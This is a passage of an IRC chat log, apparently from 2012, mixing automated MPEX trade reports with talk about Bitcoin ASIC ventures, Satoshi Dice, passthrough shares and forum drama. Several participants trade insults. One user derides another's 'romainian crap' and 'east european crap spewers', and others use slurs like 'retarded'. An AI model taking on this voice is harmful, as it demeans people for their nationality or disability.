13 16:29:31 [MPEX] [S.MPOE] 16400 @ 0.00058784 = 9.6406 BTC [+] Dec 13 16:29:32 [MPEX] [S.MPOE] 4396 @ 0.00058787 = 2.5843 BTC [+] Dec 13 16:29:33 [MPEX] [S.MPOE] 29666 @ 0.00058799 = 17.4433 BTC [+] Dec 13 16:29:34 [MPEX] [S.MPOE] 5814 @ 0.00058862 = 3.4222 BTC [+] Dec 13 16:29:35 [MPEX] [S.MPOE] 3600 @ 0.00058907 = 2.1207 BTC [+] Dec 13 16:29:36 [MPEX] [S.MPOE] 28200 @ 0.0005891 = 16.6126 BTC [+] Dec 13 16:29:37 [MPEX] [S.MPOE] 22650 @ 0.00058962 = 13.3549 BTC [+] Dec 13 16:29:38 [MPEX] [S.MPOE] 21633 @ 0.00059022 = 12.7682 BTC [+] Dec 13 16:29:39 [MPEX] [S.MPOE] 9650 @ 0.00059089 = 5.7021 BTC [+] Dec 13 16:29:40 [MPEX] [S.MPOE] 13209 @ 0.00059167 = 7.8154 BTC [+] Dec 13 16:29:41 [MPEX] [S.MPOE] 15444 @ 0.00059263 = 9.1526 BTC [+] Dec 13 16:29:42 [MPEX] [S.MPOE] 11450 @ 0.00059349 = 6.7955 BTC [+] Dec 13 16:29:43 [MPEX] [S.MPOE] 847980 @ 0.0006 = 508.788 BTC [+] Dec 13 16:29:49 ... Dec 13 16:30:15 yum Dec 13 16:30:27 first btc corp to 1mn ? race ya! Dec 13 16:34:32 The expected starting date of chips Dec 13 16:34:32 manufacturing is late August to September, 2012. The chips are supposed to be Dec 13 16:34:32 deployed and start hashing in October to November, 2012. Dec 13 16:34:44 there's nothing quite as grand as reading old asic corps threads. Dec 13 16:35:25 [MPEX] [S.MPOE] 18300 @ 0.00059638 = 10.9138 BTC [-] Dec 13 16:36:49 [MPEX] [S.MPOE] 10235 @ 0.0006 = 6.141 BTC [+] Dec 13 16:42:34 [MPEX] [S.MPOE] 7600 @ 0.0006 = 4.56 BTC [+] Dec 13 16:55:21 [MPEX] [S.MPOE] 9821 @ 0.0006 = 5.8926 BTC [+] Dec 13 17:08:12 mircea_popescu: why not currency futures? Dec 13 17:12:16 [MPEX] [S.MPOE] 7200 @ 0.0005994 = 4.3157 BTC [-] Dec 13 17:21:32 4chan now takes bitcoin https://boards.4chan.org/g/res/29831358 :) Dec 13 17:31:59 [MPEX] [S.MPOE] 20956 @ 0.0006 = 12.5736 BTC [+] Dec 13 17:37:09 [MPEX] [S.MPOE] 7600 @ 0.0005994 = 4.5554 BTC [-] Dec 13 17:37:10 [MPEX] [S.MPOE] 10800 @ 0.00059725 = 6.4503 BTC [-] Dec 13 17:38:50 [MPEX] [S.MPOE] 34465 @ 0.0006 = 20.679 BTC [+] Dec 13 17:45:23 A million is chump change. Go for a quadrillion like those derivatives guys. Dec 13 17:46:04 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.47526087 = 475.2609 BTC [-] Dec 13 17:46:12 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.40134783 = 401.3478 BTC [-] Dec 13 17:48:45 [MPEX] [S.MPOE] 25837 @ 0.0006 = 15.5022 BTC [+] Dec 13 17:54:13 B0g4r7 well i was talking about mkt value not about notional trade. also, 1 mn btc = 1 quadrillion soon enough :D Dec 13 17:54:19 sgnb working on it. Dec 13 17:55:24 [MPEX] [S.MPOE] 30950 @ 0.00059725 = 18.4849 BTC [-] Dec 13 18:00:39 [MPEX] [X.IDIFF.DEC] 1 @ 0.0327929 BTC Dec 13 18:04:37 lol asics. So now ngzhang has confirmed that Avalon is also skipping the MPW step and going directly to full wafer production. Dec 13 18:04:40 Madness. Dec 13 18:06:22 they have no clue what they're doing. Dec 13 18:06:26 [MPEX] [S.MPOE] 4321 @ 0.00059757 = 2.5821 BTC [+] Dec 13 18:06:28 [MPEX] [S.MPOE] 8079 @ 0.00059725 = 4.8252 BTC [-] Dec 13 18:06:50 Kinda looks like way, for all 3 vendors. Dec 13 18:07:10 "vendors" Dec 13 18:08:01 I thought of that meme with the dog holding the test tubes Dec 13 18:08:08 as an aside : Dec 13 18:08:10 ;;ticker Dec 13 18:08:10 BTCUSD ticker | Best bid: 13.62001, Best ask: 13.62002, Bid-ask spread: 0.00001, Last trade: 13.62001, 24 hour volume: 36800.77371952, 24 hour low: 13.30000, 24 hour high: 13.79989, 24 hour vwap: 13.61761 Dec 13 18:08:18 ;;calc 10.552 * 13.61761 Dec 13 18:08:18 BTC++ Dec 13 18:08:18 143.69302072 Dec 13 18:08:28 btc is now 2x as large as egold ever was at its peak. Dec 13 18:10:42 but there are still no big revenue streams for btc Dec 13 18:11:10 define revenue streams ? Dec 13 18:13:26 revenue stream defines you! Dec 13 18:14:18 lol Dec 13 18:14:32 [MPEX] [S.MPOE] 3300 @ 0.00059991 = 1.9797 BTC [+] Dec 13 18:18:24 [MPEX] [S.MPOE] 5260 @ 0.00059725 = 3.1415 BTC [-] Dec 13 18:18:26 [MPEX] [S.MPOE] 7100 @ 0.00059638 = 4.2343 BTC [-] Dec 13 18:18:27 [MPEX] [S.MPOE] 3640 @ 0.00059161 = 2.1535 BTC [-] Dec 13 18:21:22 i'm curious actually when will mpex dividend payments outstrip mining revenue for that month Dec 13 18:44:32 lol 4chan now takes btc Dec 13 18:45:16 [MPEX] [S.DICE] 1356 @ 0.00332457 = 4.5081 BTC [-] Dec 13 18:45:16 [MPEX] [S.DICE] 2144 @ 0.00332298 = 7.1245 BTC [-] Dec 13 19:00:34 [MPEX] [S.MPOE] 1021 @ 0.00059991 = 0.6125 BTC [+] Dec 13 19:00:35 [MPEX] [S.MPOE] 24429 @ 0.0006 = 14.6574 BTC [+] Dec 13 19:03:15 [MPEX] [S.MPOE] 18677 @ 0.0006 = 11.2062 BTC [+] Dec 13 19:03:17 [MPEX] [S.MPOE] 1699 @ 0.00060004 = 1.0195 BTC [+] Dec 13 19:04:36 [MPEX] [S.MPOE] 9600 @ 0.00060004 = 5.7604 BTC [+] Dec 13 19:05:59 mircea_popescu: cash flow is a better term, albeit a great volume of capital flows through btc, most btc transactions are satoshi dice... Dec 13 19:06:26 btc needs to be used for large payments and create some kind of cashflow climate Dec 13 19:06:38 i think we're all working towards that. Dec 13 19:07:47 [MPEX] [S.MPOE] 14149 @ 0.00060004 = 8.49 BTC [+] Dec 13 19:07:47 [MPEX] [S.MPOE] 6300 @ 0.00060106 = 3.7867 BTC [+] Dec 13 19:07:49 [MPEX] [S.MPOE] 24500 @ 0.00060152 = 14.7372 BTC [+] Dec 13 19:07:50 [MPEX] [S.MPOE] 10200 @ 0.0006124 = 6.2465 BTC [+] Dec 13 19:07:51 [MPEX] [S.MPOE] 16107 @ 0.00061252 = 9.8659 BTC [+] Dec 13 19:10:53 well you will be the first the btc VC's Dec 13 19:10:58 of the* Dec 13 19:11:09 [MPEX] [X.ACOG] 175 @ 0.05713408 = 9.9985 BTC [+] Dec 13 19:11:49 however my concern is that as btc businesses grow, those business owners won't want to invest in other companies, due to the astronomical chance of losing money Dec 13 19:12:11 mircea_popescu: Which one was that? asicminer? Dec 13 19:12:27 [MPEX] [X.INKG] 44 @ 0.07458535 = 3.2818 BTC [+] Dec 13 19:12:30 midnightmagic undefined antecedent Dec 13 19:12:49 thestringpuller depends a lot on what busienss and who runs them Dec 13 19:13:00 nobody will ever want to invest in childish glbse-level bullcrap. Dec 13 19:13:47 mircea could you asked that hooker of yours to quit crapping on forum threads since she/he/you are/is fucking annoying Dec 13 19:13:57 [MPEX] [O.BTCUSD.C120T] 600 @ 0.23166011 = 138.9961 BTC [-] Dec 13 19:13:58 PsychoticBoy what's this about ? Dec 13 19:14:07 MPOE-PR Dec 13 19:14:11 yes ? Dec 13 19:14:19 is on Ignore btw Dec 13 19:14:27 kay ? Dec 13 19:14:55 but if that shit stirrer got nothing bright to say, then its better to say nothing Dec 13 19:14:57 [MPEX] [X.ALCG] 500 @ 0.10144961 = 50.7248 BTC [+] Dec 13 19:15:21 seems to me you're doing it right now. Dec 13 19:15:26 what did you have to say ? Dec 13 19:16:16 1 thing: FU Dec 13 19:16:34 right. the principle is good, stick with it : if you have nothing intelligent to say stfu. Dec 13 19:16:36 and your romainian crap Dec 13 19:16:37 There's a lot of that going around on the internets. Dec 13 19:17:01 here in the west we puke on east european crap spewers Dec 13 19:17:06 mircea_popescu: well glbse is akin to this asic nonsense, a lot of money just disappearing with nothing to show Dec 13 19:17:26 which is the symptom of a dying business, or an abomination that is called a business Dec 13 19:17:27 thestringpuller if bfl actually croaks that'll be a valley of tears. Dec 13 19:17:50 leaving alone that the two other asic troops came out with comparable news. Dec 13 19:17:53 but if nothing can be produced with the capital less people will be willing to invest Dec 13 19:18:29 people should start simple, like selling large amounts of commodities Dec 13 19:18:33 I wonder what the BFL books look like. I understand they only caught up on FPGA orders long after they started taking asic money. Dec 13 19:19:21 B0g4r7 something like, +1-200k on fpga, +2ish mn from vc +3ish mn from pre-orders -.5 mn for expenses -2ish mn for failed run -.8mn for refunds Dec 13 19:19:28 I also wonder how many worthless million-dollar masksets they've bought so far. Dec 13 19:19:46 so they still have some cash, on the positive side. Dec 13 19:19:57 mircea_popescu: all I'm saying is that only a few businesses have sustainability and a sustainable income stream, you attract capital by creating jobs or creating "useful shit" Dec 13 19:20:01 Assuming they've not snorted it all. Dec 13 19:20:08 B0g4r7 yes, asuming that. Dec 13 19:20:10 how many positions you got open at MPEX ;) Dec 13 19:20:29 thestringpuller well, creating jobs as a pretend-value proxy is a government racket. Dec 13 19:20:36 busiensses in general create value not jobs. Dec 13 19:21:26 [MPEX] [X.ISP5] 120 @ 0.10902456 = 13.0829 BTC [+] Dec 13 19:21:54 i mispoke, i forget I"m speaking to mr. rothbard and not mr. keynes (i kid), value creates income streams in which other people can access a job is merely trading time and some kind of skill to contribute to the business in exchange for access to the revenue stream Dec 13 19:22:01 [MPEX] [X.ASBG] 120 @ 0.11401584 = 13.6819 BTC [+] Dec 13 19:22:21 thestringpuller have you seen the http://trilema.com/2012/probably-the-hottest-business-idea-of-the-moment-in-btc/ ? Dec 13 19:22:29 a business that creates sustainable value will have recurring revenue to show for it Dec 13 19:22:34 no i'm outof credits Dec 13 19:23:55 the thing about it is that most code review for large projects is done in house no? Dec 13 19:24:19 That's how we did it at the software house. Dec 13 19:24:22 i feel like your target market would be financial firms who connect to the banks Dec 13 19:24:37 The only external review was one "security audit" of some sensitive code. Dec 13 19:25:33 mircea_popescu: i feel as though this would be best suited for smaller projects Dec 13 19:25:39 like an indie game for instance Dec 13 19:25:42 Internally, on the other hand, every single commit got peer-reviewed, and went through rounds of revisions if recommended, before being merged into Trunk. Dec 13 19:25:46 or an app for a small business Dec 13 19:27:04 so the most credible programmer I know atm writes compilers Dec 13 19:27:13 he charges 50-80 USD an hour Dec 13 19:27:17 if not more Dec 13 19:27:33 you'd need like 4 of those Dec 13 19:27:59 so your base expense is like like what 32000 a month? Dec 13 19:28:07 you'd need a lot of clients Dec 13 19:31:20 [MPEX] [S.MPOE] 4321 @ 0.00059936 = 2.5898 BTC [-] Dec 13 19:31:22 [MPEX] [S.MPOE] 429 @ 0.00059905 = 0.257 BTC [-] Dec 13 19:32:34 http://jcph.am/2012/12/13/two-track-thursdays-part-deux/ Dec 13 19:32:36 music Dec 13 19:33:25 hehe looks like genjix/amir has made some friends around here in slovakia Dec 13 19:33:46 The only external review was one "security audit" of some sensitive code. << this is exactly it tho Dec 13 19:33:53 i just got an information "amir is going to organize another bitcoin conference" Dec 13 19:34:04 ahahaha fuckwit. Dec 13 19:34:09 "but in novemnber, he wants to have 2000 paople there" Dec 13 19:34:11 lmao Dec 13 19:34:54 so your base expense is like like what 32000 a month? << that's 2k btc. no big deal. Dec 13 19:35:36 but at any rate an indie game is no small project. Dec 13 19:35:48 games are some of the most complex projects Dec 13 19:36:47 [MPEX] [X.ACCA] 3 @ 0.18677491 = 0.5603 BTC [+] Dec 13 19:38:08 lets make a bet then Dec 13 19:38:09 [MPEX] [S.MPOE] 15871 @ 0.00059905 = 9.5075 BTC [-] Dec 13 19:38:17 or lets make a game then* Dec 13 19:38:26 and move dem units Dec 13 19:39:14 [MPEX] [S.MPOE] 4321 @ 0.00059167 = 2.5566 BTC [-] Dec 13 19:39:15 [MPEX] [S.MPOE] 15860 @ 0.00059161 = 9.3829 BTC [-] Dec 13 19:39:17 [MPEX] [S.MPOE] 5489 @ 0.00059133 = 3.2458 BTC [-] Dec 13 19:39:27 My brother makes indie games. Dec 13 19:39:31 meh. that teppy guy made a game, it looks pretty grim. Dec 13 19:40:34 i'm talking about a game to compete with Rockstar mang Dec 13 19:40:44 once you make one and you own the studio Dec 13 19:41:00 then you can sit around and make crazy shit all day Dec 13 19:41:06 which you already likely do Dec 13 19:41:22 Compete with rockstar huh. Dec 13 19:41:36 I'll bet a lot of Rockstar's success can be attributed to slick marketing. Dec 13 19:41:43 naw man Dec 13 19:41:54 they almost went under when EA went on an acquisition spree Dec 13 19:41:56 i never played rockstar Dec 13 19:42:18 but they built a lot of stuff in house that likely sells for quite a bit Dec 13 19:42:19 Rockstar Studios, makers of GTA, Manhunt, and other fucked-up titles. Dec 13 19:43:14 a gta stuff Dec 13 19:43:36 i think i played some nude/porn mod for it for 5 minutes Dec 13 19:43:52 [MPEX] [S.MPOE] 4321 @ 0.00059211 = 2.5585 BTC [+] Dec 13 19:43:54 [MPEX] [S.MPOE] 4829 @ 0.00059221 = 2.8598 BTC [+] Dec 13 19:44:01 hot coffee Dec 13 19:44:09 I played it for a while. It gets old in a hurry for me. Dec 13 19:44:43 I much prefer to play Zelda or similar. Dec 13 19:45:18 i still play heroes 2 to this day Dec 13 19:45:20 with the girls Dec 13 19:51:05 [MPEX] [S.MPOE] 4321 @ 0.00059153 = 2.556 BTC [-] Dec 13 19:51:07 [MPEX] [S.MPOE] 4584 @ 0.00059133 = 2.7107 BTC [-] Dec 13 20:01:49 06:34 < mircea_popescu> there's nothing quite as grand as reading old asic corps threads. <-- to which corp are you referring? Dec 13 20:02:41 a, that was asicminer indeed. Dec 13 20:03:25 [MPEX] [X.EHOG] 59 @ 0.22696117 = 13.3907 BTC [+] Dec 13 20:06:58 [MPEX] [S.MPOE] 4321 @ 0.00059168 = 2.5566 BTC [+] Dec 13 20:07:00 [MPEX] [S.MPOE] 3380 @ 0.00059133 = 1.9987 BTC [-] Dec 13 20:07:01 [MPEX] [S.MPOE] 10750 @ 0.00059055 = 6.3484 BTC [-] Dec 13 20:07:02 [MPEX] [S.MPOE] 8233 @ 0.00059 = 4.8575 BTC [-] Dec 13 20:08:17 ;;bc,calc 30000 Dec 13 20:08:17 use the 'gentime' command instead Dec 13 20:08:22 ;;gentime 30000 Dec 13 20:08:23 The average time to generate a block at 30000.0 Mhps, given difficulty of 3370181.79928, is 5 days, 14 hours, 1 minute, and 34 seconds Dec 13 20:17:44 jurov: you should organise to film someone reasonably eloquent challenging Amir on his bitcoin 'expertise' Dec 13 20:19:19 maybe mpoe-pr can come from timisoara, it's just 500km to here... not sure if i'll be able to pay her, tho :) Dec 13 20:19:33 perhaps we can collect Dec 13 20:20:05 lol Dec 13 20:20:27 I vote we send Mircea Dec 13 20:20:32 where is this, bratislava ? Dec 13 20:20:36 yea Dec 13 20:21:13 tru story. Dec 13 20:21:54 haha. infact the chocolate fatory is in kittsee right here over the border Dec 13 20:26:00 *factory Dec 13 20:26:27 timisoara, bratislava Dec 13 20:26:28 lol Dec 13 20:26:30 nono, you had it right. fatory. Dec 13 20:26:55 http://polimedia.us/dtng/c/src/135542319974.png ahhhhh Dec 13 20:28:01 hehe... i actually expected it few weeks earlier, so i got these loans Dec 13 20:28:19 the day i repaid last of them, it went amok Dec 13 20:28:23 lmao Dec 13 20:28:53 cause we bought with the repaid loan money! Dec 13 20:28:57 hahaha Dec 13 20:29:01 screw you Dec 13 20:29:05 !ticker s.mpoe Dec 13 20:29:07 [MPEX:S.MPOE] 1day: 0.00055949 / 0.00058083 / 0.00061252 (4203825 shares, 2,441.74 BTC), 30day: 0.00048504 / 0.00051854 / 0.00061252 (102523166 shares, 53,162.72 BTC) Dec 13 20:29:18 you borrowed like 10k ? Dec 13 20:29:45 oh nooo, just some 240btc Dec 13 20:29:54 well then kakobrekla is telling lies!!!1 Dec 13 20:30:00 ofc i am. Dec 13 20:30:08 heh Dec 13 20:30:13 you boing-boing to this genjix thing jurov is organising ? Dec 13 20:31:10 [MPEX] [S.MPOE] 3500 @ 0.00059 = 2.065 BTC [-] Dec 13 20:32:36 this was my reply translated "i want to make some money, not thrown down new world ordewr or wharever like amir. that will be just side effect" Dec 13 20:33:01 oh no... my keyboard skillz Dec 13 20:33:13 http://www.mattwhitlock.com/Bitcoin%20Inflation.png Dec 13 20:33:22 this is pretty useful, finally someone made it. Dec 13 20:33:51 we're finally in the < 20% a year inflation, which makes us akin to developing countries. Dec 13 20:34:05 by 2020 we'll be in the <5% Dec 13 20:35:23 haha we have kinda developing country demographic, too Dec 13 20:35:59 YO I HEARD 4CHAN ACCEPTS BITCOIN NOW Dec 13 20:36:28 jurov indeed. jcpham yeah. atlas' idea Dec 13 20:36:59 Pass purchasing is currently disabled, please come back in 2 hours. Dec 13 20:36:59 @mods Dec 13 20:36:59 Due to some confusion in writing correctly, this thread made fun & i lost my anger. Dec 13 20:36:59 I request mods to delete this thread, as it has no use. Dec 13 20:37:02 point in case. Dec 13 20:45:38 [MPEX] [S.DICE] 752 @ 0.00332298 = 2.4989 BTC [-] Dec 13 20:45:39 [MPEX] [S.DICE] 2448 @ 0.00332218 = 8.1327 BTC [-] Dec 13 20:47:58 [MPEX] [S.MPOE] 17800 @ 0.00059 = 10.502 BTC [-] Dec 13 20:52:37 [MPEX] [S.MPOE] 4321 @ 0.00059217 = 2.5588 BTC [+] Dec 13 20:52:38 [MPEX] [S.MPOE] 4511 @ 0.00059221 = 2.6715 BTC [+] Dec 13 20:58:06 grrr Dec 13 20:58:30 what does this stupid threat keep bumpig & resetting to unread even though its locked??? Dec 13 20:58:35 https://bitcointalk.org/index.php?topic=109666.0 Dec 13 20:59:00 hes somehow abusing this shit Dec 13 20:59:26 the guy is obviously retarded attention whore Dec 13 20:59:31 unlock thread make post delete post lock thread Dec 13 20:59:59 any forum mods on hand? Dec 13 21:00:05 hes really gotten under my skin lately Dec 13 21:00:21 Diablo-D3 of zee germanz Dec 13 21:00:33 lol Dec 13 21:00:54 knowing how late he was awake, hes gotta be asleeper by nice Dec 13 21:01:09 he should be called Siablo-S3 Dec 13 21:01:28 do they mods actually check the 'report post' stuff ? Dec 13 21:01:34 or is that a days later thing Dec 13 21:01:34 no Dec 13 21:01:42 figures Dec 13 21:03:17 [MPEX] [S.MPOE] 4321 @ 0.00059219 = 2.5589 BTC [-] Dec 13 21:03:18 [MPEX] [S.MPOE] 5929 @ 0.00059221 = 3.5112 BTC [+] Dec 13 21:04:57 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.61654734 = 616.5473 BTC [+] Dec 13 21:05:10 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.5342946 = 534.2946 BTC [+] Dec 13 21:07:51 [MPEX] [S.MPOE] 2242 @ 0.00059009 = 1.323 BTC [-] Dec 13 21:10:48 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.53425942 = 534.2594 BTC [-] Dec 13 21:10:55 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.61651474 = 616.5147 BTC [-] Dec 13 21:11:32 that's so not itm Dec 13 21:22:00 [MPEX] [S.MPOE] 9050 @ 0.00059221 = 5.3595 BTC [+] Dec 13 21:22:35 [MPEX] [S.MPOE] 4510 @ 0.00059221 = 2.6709 BTC [+] Dec 13 21:22:37 [MPEX] [S.MPOE] 17598 @ 0.00059858 = 10.5338 BTC [+] Dec 13 21:22:38 [MPEX] [S.MPOE] 2142 @ 0.00059925 = 1.2836 BTC [+] Dec 13 21:29:37 [MPEX] [S.MPOE] 2079 @ 0.00059009 = 1.2268 BTC [-] Dec 13 21:29:39 [MPEX] [S.MPOE] 28995 @ 0.00059 = 17.1071 BTC [-] Dec 13 21:41:12 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.61641271 = 616.4127 BTC [-] Dec 13 21:41:22 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.53414929 = 534.1493 BTC [-] Dec 13 21:42:16 [MPEX] [S.MPOE] 4321 @ 0.0005901 = 2.5498 BTC [+] Dec 13 21:42:17 [MPEX] [S.MPOE] 24679 @ 0.00059 = 14.5606 BTC [-] Dec 13 21:48:01 https://bitcointalk.org/index.php?topic=105120.msg1396786#msg1396786 Dec 13 21:48:02 wtf ?! Dec 13 21:49:17 lame Dec 13 21:49:29 I would say trolling account? Dec 13 21:51:03 maybe, who knows at this point Dec 13 21:52:22 [MPEX] [S.MPOE] 13000 @ 0.00059 = 7.67 BTC [-] Dec 13 21:54:32 These bursts of high volume started the day after Erik came back from his meeting in Macau with casino owners. Maybe casinos there are doing some robustness testing? It's pocket change for them. Dec 13 21:54:40 Bugpowder you know you might not be that far off Dec 13 21:54:55 i know i wouldn't make an offer before i tried to break it. Dec 13 21:59:07 [MPEX] [S.MPOE] 4321 @ 0.00059295 = 2.5621 BTC [+] Dec 13 21:59:08 [MPEX] [S.MPOE] 3279 @ 0.00059308 = 1.9447 BTC [+] Dec 13 22:03:52 [MPEX] [S.MPOE] 4321 @ 0.00059305 = 2.5626 BTC [-] Dec 13 22:03:53 [MPEX] [S.MPOE] 6469 @ 0.00059308 = 3.8366 BTC [+] Dec 13 22:08:07 [MPEX] [S.MPOE] 2545 @ 0.00059495 = 1.5141 BTC [+] Dec 13 22:08:09 [MPEX] [S.MPOE] 4321 @ 0.00059005 = 2.5496 BTC [-] Dec 13 22:08:10 [MPEX] [S.MPOE] 7784 @ 0.00059 = 4.5926 BTC [-] Dec 13 22:13:53 mircea_popescu Whoever is doing the testing appears to be back! http://satoshidice.com/lookup.php?tx=&limit=1000&min_bet=10&status=ALL Dec 13 22:14:01 http://uchicagoadmissions.tumblr.com/post/37809971913/indiana-jones-mystery-package-we-dont-really Dec 13 22:15:31 how much are they up yet ? 12k ? Dec 13 22:15:48 about 10,000 bet in the last hour Dec 13 22:16:07 with a 500 BTC loss for S.DICE Dec 13 22:16:18 crazy Dec 13 22:17:46 0,o... Dec 13 22:20:41 the sort of retarded shit kids do today ;/ Dec 13 22:20:45 go eat a fucking bear ffs. Dec 13 22:32:20 http://i.imgur.com/XfhaQ.png lmao check out the spikedom Dec 13 22:34:47 SD Profit after fees: 16230.26831626 BTC (1.306%) end of nov Dec 13 22:34:58 SD Profit before fees: 20620.58601763 BTC (1.478%) 10 dec Dec 13 22:35:04 +4.5k Dec 13 22:37:07 when do divs get paid? Dec 13 22:37:15 early jan Dec 13 22:37:17 so disappointed, i thought it was a dtng link Dec 13 22:37:21 good Dec 13 22:37:33 sorry pigeons Dec 13 22:37:38 I am working on uhh.. making it possible to get sdice shares w/o having mpex account before then. Dec 13 22:37:46 hopefully by this weekend Dec 13 22:37:50 mircea_popescu: no offense Dec 13 22:37:51 hehe Dec 13 22:38:03 patthru stuffs Dec 13 22:38:03 :P Dec 13 22:38:05 what offense'd that be ?! Dec 13 22:38:06 like we discussed Dec 13 22:38:17 just the fact that I wont be buying directly on mpex hehe Dec 13 22:38:29 but Dec 13 22:38:33 you prefer being a wholesaler Dec 13 22:38:34 right? Dec 13 22:39:12 fewer individuals, and more bulk users Dec 13 22:39:28 for one glbse had a s.dice passthrough Dec 13 22:39:38 i dun see any problem with it Dec 13 22:39:48 no Dec 13 22:39:55 i just ment sorry that I wont be directly giving you the fees Dec 13 22:39:56 lol Dec 13 22:39:58 course, i don't see how you'd have a PT w/o actually holding the shares Dec 13 22:40:15 mircea_popescu: hopefully "we" will annonce soon Dec 13 22:40:16 :) Dec 13 22:40:20 [MPEX] [S.MPOE] 4321 @ 0.00059871 = 2.587 BTC [+] Dec 13 22:40:22 [MPEX] [S.MPOE] 14679 @ 0.0005989 = 8.7913 BTC [+] Dec 13 22:40:25 just waiting to work out the final details Dec 13 22:40:40 coinbr will probably offer limited free account to finally get rid of this passthrough nonsense Dec 13 22:40:57 lol Dec 13 22:41:06 jurov: the PT is for a BF asset Dec 13 22:41:07 :) Dec 13 22:41:09 jurov sounds more like some sort of synthetic offering Dec 13 22:41:11 i planto buy some shares myself Dec 13 22:42:04 ok, i don't hold my breath. if you offered S.MPOE options/ futures, now that would be interesting Dec 13 22:42:05 but it would be an an mpex passthru to s.dice yes Dec 13 22:42:32 as a passthrough asset? not really possibly... a fund that manages them.. sure.. but not direct passthroughs Dec 13 22:42:44 BF wasnt really setup with the idea of assets that regularly end Dec 13 22:42:49 wasnt the initial intention Dec 13 22:43:00 mpoe futures i'd be curious about tbh Dec 13 22:43:11 not that its not doable mind you... Dec 13 22:43:23 using the current functionality it woudl work just fine I suppose Dec 13 22:43:28 Ukto i think futures may be doable. options tho... not so much Dec 13 22:43:40 just issue shares at X price... let ppl trade them.. and use force buyback and Y price Dec 13 22:43:45 or such Dec 13 22:44:04 that didn't make sense Dec 13 22:44:12 ... Dec 13 22:44:16 look who you are talking to Dec 13 22:44:18 why would it? Dec 13 22:44:20 :P Dec 13 22:44:49 lol Dec 13 22:45:48 I have the otc-style btc/(aud/cad/usd) options on weex Dec 13 22:46:05 was debating transfering that code into BF for btc/(asset) options trading Dec 13 22:46:35 crypto did somethign similar.. doesnt seem to be getting used there Dec 13 22:46:40 but neither does their site in general Dec 13 22:47:17 i think the mpbor etf would be good too Dec 13 22:47:32 [MPEX] [S.MPOE] 4321 @ 0.00059882 = 2.5875 BTC [-] Dec 13 22:47:33 [MPEX] [S.MPOE] 5871 @ 0.0005989 = 3.5161 BTC [+] Dec 13 22:47:35 [MPEX] [S.MPOE] 12658 @ 0.00059925 = 7.5853 BTC [+] Dec 13 22:47:37 [MPEX] [S.MPOE] 1600 @ 0.00060049 = 0.9608 BTC [+] Dec 13 22:48:09 actually a mpbor etf is pretty much the only legitimate etf in btc space i can see Dec 13 22:48:22 because it takes some thinking to get the capital split up right to optimize your reward Dec 13 22:51:33 smickles: you do one Dec 13 22:52:23 lol i think smickles is so happy for having escaped glbse he's not gonna for months Dec 13 22:52:59 yeah i figured Dec 13 22:53:59 LOL Dec 13 22:54:09 anyone here know Cartnh? from the forums ? Dec 13 22:57:55 nope Dec 13 22:58:11 Carnth even Dec 13 23:02:54 da one Dec 13 23:03:01 equals sign smickles Dec 13 23:03:58 smickles superb premium deluxe coin llc dot com Dec 13 23:04:11 lol Dec 13 23:09:58 [MPEX] [S.MPOE] 21750 @ 0.00060049 = 13.0607 BTC [+] Dec 13 23:10:00 [MPEX] [S.MPOE] 18850 @ 0.00060136 = 11.3356 BTC [+] Dec 13 23:10:01 [MPEX] [S.MPOE] 2050 @ 0.0006018 = 1.2337 BTC [+] Dec 13 23:12:18 [MPEX] [S.MPOE] 8450 @ 0.0006018 = 5.0852 BTC [+] Dec 13 23:12:18 [MPEX] [S.MPOE] 7398 @ 0.00060263 = 4.4583 BTC [+] Dec 13 23:20:30 [MPEX] [S.MPOE] 2151 @ 0.00060263 = 1.2963 BTC [+] Dec 13 23:20:31 [MPEX] [S.MPOE] 6399 @ 0.00061001 = 3.9035 BTC [+] Dec 13 23:25:34 burnside: you tehre? Dec 13 23:25:53 the bids tabe for an asset on btct.co is listing a price of ? 1.0E-5 Dec 13 23:37:13 [MPEX] [S.MPOE] 12076 @ 0.00059992 = 7.2446 BTC [-] Dec 13 23:40:28 being all scientific and shit Dec 13 23:40:34 ill implement that as well! Dec 13 23:40:45 lol Dec 13 23:41:01 i was thinking of using base 7 for all numbers on mpex Dec 13 23:41:13 hehe Dec 13 23:41:37 i had a binary wrist watch Dec 13 23:41:45 well i still do, but i dont wear it Dec 13 23:41:58 its alright after some time you just go after the pattern Dec 13 23:42:16 mhm Dec 13 23:42:52 i had this shit when i was 13 or smth Dec 13 23:43:09 fucked up kid. Dec 13 23:43:17 i feel sick when i sel my bitcoins Dec 13 23:43:21 is that normal Dec 13 23:44:10 yes. Dec 13 23:44:15 thus i never sell any. Dec 13 23:44:42 thats a good plan not errybody can follow Dec 13 23:47:51 [16:40] i was thinking of using base 7 for all numbers on mpex Dec 13 23:47:53 sooner or later i have to sell something to profit Dec 13 23:47:57 what about tonal? Dec 13 23:48:17 just make it anal while you are at it. Dec 13 23:48:26 to anal! Dec 13 23:48:35 anal numbering? Dec 13 23:48:56 kakobrekla: i'm sure one of these will be worth while programming a binary clockface for -> http://www.imwatch.it/us-en/eshop?cat=3cat/i_m_gold-scat Dec 13 23:49:20 ;;ticker Dec 13 23:49:21 BTCUSD ticker | Best bid: 13.75004, Best ask: 13.75005, Bid-ask spread: 0.00001, Last trade: 13.75004, 24 hour volume: 23515.12067156, 24 hour low: 13.40011, 24 hour high: 13.80000, 24 hour vwap: 13.67913 Dec 13 23:49:30 ffs go down Dec 13 23:49:37 ikr Dec 13 23:49:45 this always happens when i sell Dec 13 23:50:08 similarly if I were to buy them, the price would go down Dec 13 23:50:14 god hates me Dec 13 23:50:17 http://trilema.com/2012/high-finance-falootin/ Dec 13 23:50:20 grrr Dec 13 23:50:23 for to piss off da haters Dec 13 23:50:23 that asshat did it again Dec 13 23:50:34 relocked his thread to bump it Dec 13 23:50:55 Diablo-D3: you awake yet? :P Dec 13 23:52:36 markedathome heh, well.. wristwatches... theres is a reason why i dont wear em. Dec 13 23:52:59 Ukto: he's generally not on IRC when asleep Dec 13 23:52:59 Ukto: I just got up, why? Dec 13 23:53:17 Diablo-D3: https://bitcointalk.org/index.php?topic=109666.0 Dec 13 23:53:21 [MPEX] [S.DICE] 283 @ 0.00332218 = 0.9402 BTC [-] Dec 13 23:53:26 the guy keeps bumping his thread Dec 13 23:53:27 over and over Dec 